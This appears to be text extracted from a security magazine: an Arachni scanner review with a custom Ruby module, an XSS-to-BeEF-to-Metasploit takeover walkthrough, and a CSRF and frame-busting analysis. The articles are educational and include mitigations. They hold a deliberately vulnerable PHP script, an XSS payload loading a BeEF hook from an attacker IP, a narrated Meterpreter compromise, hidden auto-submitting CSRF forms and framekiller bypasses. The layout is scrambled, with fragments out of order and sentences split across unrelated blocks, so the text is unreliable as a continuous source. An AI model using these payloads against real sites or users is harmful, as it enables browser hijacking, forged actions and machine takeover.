Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). These tools are really meant to be used by a skilled consultant doing manual investigations of the application.
Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction from the user.
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools for the job at hand. Is Arachni worthwhile?
Time for an in-depth review
Under the Hood
According to the documentation, Arachni offers the following:
• Simplicity: everything is simple and straightforward, from a user's or component developer's point of view
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins. Developers can easily use the advanced framework features without knowing the nitty-gritty details
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.
Table 1: Overview of the audit and reconnaissance modules included with Arachni
Audit Modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon Modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid).
This is great if you want to speed up the scan, or if you want to execute some crazy things like running
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.
Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.
The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.
The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.
At the start of every scan, a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.
The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.
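A rough Python analogue of that parsing step (Arachni itself does this in Ruby with Nokogiri plus regular expressions) shows how links and form fields can be pulled even out of sloppy, unclosed HTML; the sample page below is invented for the example:

```python
from html.parser import HTMLParser

class LinkFormExtractor(HTMLParser):
    """Collect link targets, form actions and input names from a page."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.links, self.forms, self.inputs = [], [], []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "a" and "href" in attrs:
            self.links.append(attrs["href"])
        elif tag == "form":
            self.forms.append(attrs.get("action", ""))
        elif tag == "input" and "name" in attrs:
            self.inputs.append(attrs["name"])

# Badly written HTML: none of the tags are closed, yet parsing still works.
page = '<a href="/about">About<form action="/login"><input name="user">'
extractor = LinkFormExtractor()
extractor.feed(page)
```

A scanner feeds every extracted form field and link back into its audit modules as an injection point.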
Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of modules: audit modules and reconnaissance (recon) modules. Table 1 provides an overview.
Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.
Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.
Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client
Table 2: Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form-based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP authentication and forms-based authentication
• Profiler: performs taint analysis with benign inputs and response time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  - AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  - TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  - Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones, thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.
Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.
Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1.
This will install all source directories in your home directory. Change the cd commands if you want the sources somewhere else. In case you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3, some changes have been made to the experimental version to make it easier, so here we go.
Please note that these installation instructions start with the installation of Cygwin and all required dependencies.
Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:
• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1: Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2: Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades. In any case, an upgrade of Cygwin usually means recompiling any tools that you compiled earlier.
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First, we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands in Listing 2 in the Cygwin shell (note: these are the same commands as for the Linux installation).
In case of weird error messages (especially on Vista systems) regarding fork during compilation, execute the following in your Cygwin shell:
$ find /usr/local -iname '*.so' > /tmp/localso.lst
Quit all Cygwin shells. Use Windows to browse to C:\cygwin\bin. Right-click ash.exe and choose run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How you fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all the functionality that is available from the command line.
The GUI can be started by executing the following commands:
$ arachni_rpcd &
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1: Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):
• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues have been detected and how far along the process is
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, ...
• Settings: the settings screen allows you to add cookies and headers, limit the scan to certain directories, ...
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text
• Add-ons: three add-ons are installed:
  - Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  - Tutorial: serves as an example
  - Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command-line and the GUI. First the command-line: start a scan with all modules active. This is extremely easy:
$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr
Afterwards, the HTML report can be created by executing the following:
$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules will create a lot of requests, making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the regular expression with a dash. Example:
$ arachni --mods=*,-xss_* http://www.example.com
The above will load all modules except the modules related to Cross-Site Scripting (XSS).
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.
The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen.
If you want to run a scan against some test applications, visit my blog for the list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site: in most jurisdictions this is illegal unless permission is explicitly granted by the owner).
After the scan, just go to the Reports screen and download the report in the format you want.
Figure 2. Start a scan screen
Listing 3. Create your own module
=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos
  <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common files on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author: Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # to keep track of the requests and not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '*' )
        }
    end

    def run( )
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )
            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module will be vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{A SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.
Move into your Arachni source tree. You'll find the modules directory; in there you'll find two directories: audit and recon. Move into the recon directory. We will create our Ruby module here.
Arachni makes it real easy: if your module needs external files, it will search in a subdirectory with the same name. Example: if you create a svn_digger_dirs.rb module, this module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
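The setup steps above can also be scripted; a minimal Ruby sketch (the paths come from the text, the assumption that all-dirs.txt sits in the current directory is ours):

```ruby
require 'fileutils'

# Directory in which the new module will look for its external files
dir = 'modules/recon/svn_digger_dirs'
FileUtils.mkdir_p(dir)

# Move the SVNDigger wordlist into place; assumes all-dirs.txt was already
# extracted from the downloaded archive into the current directory
FileUtils.mv('all-dirs.txt', File.join(dir, 'all-dirs.txt')) if File.exist?('all-dirs.txt')
```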
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows: Listing 3.
The code does not need a lot of explanation: it will check whether or not a specific directory exists; if yes, it will forward the name to the Arachni Trainer (which will include the directory in the further scans) as well as create a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, are now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON related vulnerabilities in the application you are testing.

Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.

And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup; this is to show that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would function in the real world. Sure, he'd use a pop-up initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this also.
HTML Page:

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS – BeEF – Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User enters a script in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of the user clicking on a link which will generate a popup box, the user will instead be tricked into clicking on a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src=
'http://192.168.56.101/beef/hook/beefmagic.js.php'>
</script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a Zombie has connected. You can see this in the Log section on the right hand side or the Zombie section on the left hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane, then click on Standard Modules – Alert Dialog. This will result in a little popup box popping up on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, because of BeEF, even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server Side PHP Code:

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of a simple text input, the attacker enters a simple JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>
The screenshot below clarifies the above steps (Figure 1).
BeEF – Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not what an attacker will stop at. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball, copy it into your web server directory
Figure 3. Connection with BeEF controller
Figure 4. What attacker will see
Figure 5. What victim will see
Figure 6. Defacing the current Web Page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user browser
Figure 8. Starting Metasploit
Figure 9. The "jobs" command
Figure 10. Metasploit after clicking "Send Now"
Figure 11. Meterpreter window – screenshot 1
Figure 12. Meterpreter window – screenshot 2
Now, first ensure that the Zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in other services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window – screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS prevention cheat sheet is a good guide for the same.
• White list and black list filtering can also be used to completely disallow specific characters in user input fields.
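The encoding step above can be sketched in Ruby (the article's fix would live in its PHP code, e.g. via htmlspecialchars; CGI.escapeHTML is the Ruby stdlib equivalent and our choice here):

```ruby
require 'cgi'

# Untrusted input, e.g. the vulnerable "search" parameter from the example
user_input = "<script>alert(document.domain)</script>"

# Encode the output before reflecting it into the page; the browser then
# renders the payload as inert text instead of executing it
safe_output = CGI.escapeHTML(user_input)
puts safe_output
# &lt;script&gt;alert(document.domain)&lt;/script&gt;
```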
Conclusion
In a nutshell, we can conclude that even a single parameter vulnerable to XSS can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System, Network and Web Application Penetration testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering.
Email – arvinddoraiswamy@gmail.com
LinkedIn – http://www.linkedin.com/pub/arvind-doraiswamy/39b21332
Other writings – http://resources.infosecinstitute.com/author/arvind AND http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: this stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking: some users prohibit referrers, so you cannot just require referrer headers. Techniques to selectively create HTTP requests without referrers exist.
Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to fill in the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users.
Listing 1. HTML code used to bypass protection
<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like
      www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit();</script>
</div>
index.php (Victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (Victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario: Listing 4.
index.php (Evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
var token = window.frames[0].document.forms['messageForm'].token.value;
Browser settings are not hard to modify, so the best way for web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
It consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so they can be compared after the form is submitted.
Mechanisms used to subvert one-time tokens usually rely on brute force attacks. Brute forcing one-time tokens pays off only if the generation mechanism is widely used by web developers. For example, the following PHP code:

<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
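For comparison, a sketch of the same idea in Ruby; SecureRandom and the constant-time check are our additions, not part of the article's PHP:

```ruby
require 'securerandom'

# An unpredictable one-time token; SecureRandom draws from the OS CSPRNG,
# which is considerably harder to brute-force than md5(uniqid(rand(), TRUE))
token = SecureRandom.hex(16)

# Constant-time comparison: the check should not leak, via timing, how many
# leading characters of a guessed token were correct
def tokens_match?(expected, submitted)
  return false unless expected.bytesize == submitted.bytesize
  expected.bytes.zip(submitted.bytes).reduce(0) { |acc, (a, b)| acc | (a ^ b) }.zero?
end

session = { token: token }   # simplified server-side session store
hidden_field_value = token   # the value echoed into the form's hidden field
puts tokens_match?(session[:token], hidden_field_value)
```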
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token: Listing 2.
Listing 2. Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. Correct token
<?php
session_start();
if($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
}
else {
    echo "Bad request";
}
?>
And common counter-action statements are these:
top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write('')
top.location.replace(document.location)
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1:
<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:
<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>
This protects the web application even if an attacker browses the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvel.gevorgyan@cybergates.am
